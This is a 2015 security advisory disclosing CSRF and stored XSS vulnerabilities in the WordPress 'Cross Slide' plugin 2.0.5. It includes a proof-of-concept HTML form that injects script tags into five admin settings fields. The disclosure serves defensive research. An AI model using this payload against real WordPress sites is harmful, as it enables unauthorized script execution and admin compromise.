Title: WordPress 'Cross Slide' plugin - XSS/CSRF
Version: 2.0.5
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/crossslide-jquery-plugin-for-wordpress/
Contacted WordPress: 2015/01/26
==========================================================

## Plugin description: 
==========================================================
The CrossSlide jQuery plugin for WordPress is designed to quickly add the JS and CSS requirements to operate the jQuery slideshow. 

## CSRF:
==========================================================
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. 


## Stored XSS:
==========================================================
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. 

PoC:
Log in as admin and submit this form: 
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=thisismyurl_csj.php"> 
 	<input type="text" name="csj_width" value="800&quot;/><script>alert(1)</script>"><br />
	<input type="text" name="csj_height" value="800&quot;/><script>alert(2)</script>"><br />
	<input type="text" name="csj_sleep" value="800&quot;/><script>alert(3)</script>"><br />
	<input type="text" name="csj_fade" value="800&quot;/><script>alert(4)</script>"><br />  
	<input type="text" name="upload_image" value="800&quot;/><script>alert(5)</script>"><br />
	<input type="submit">
</form>


## Solution
==========================================================
No fix available.